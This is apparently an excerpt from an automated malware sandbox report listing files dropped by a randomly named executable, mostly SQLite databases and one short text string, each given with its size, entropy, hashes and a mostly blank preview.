                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):25
                                                                                  Entropy (8bit):3.913269689515108
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:r0jU1E3n:oo1c
                                                                                  MD5:F3AA53F2375D953F677C5CDB39BE097B
                                                                                  SHA1:4CF94D3A215F5EF7AE23A8D5CE9EA9080601011A
                                                                                  SHA-256:F64F9F14E5E06E146E6356D65383A21B1B0797730C5CC177791E3E0C2EF6700D
                                                                                  SHA-512:925477E89434D4F7F0B444657D591080F5266A46F0557CDA2F0127C45236545921CA53AAE44CD51F3365D626917F69755DB8707AAFCC46316C09742DC7FBD4DB
                                                                                  Malicious:false
                                                                                  Preview:zrFZY70szaEAYX1AY6RzE26KA
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
